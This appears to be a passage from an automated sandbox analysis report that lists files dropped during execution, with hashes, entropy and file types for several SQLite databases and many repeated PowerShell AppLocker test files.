                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5707520969659783
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5707520969659783
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):49152
                                                                                Entropy (8bit):0.8180424350137764
                                                                                Encrypted:false
                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                Malicious:false
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
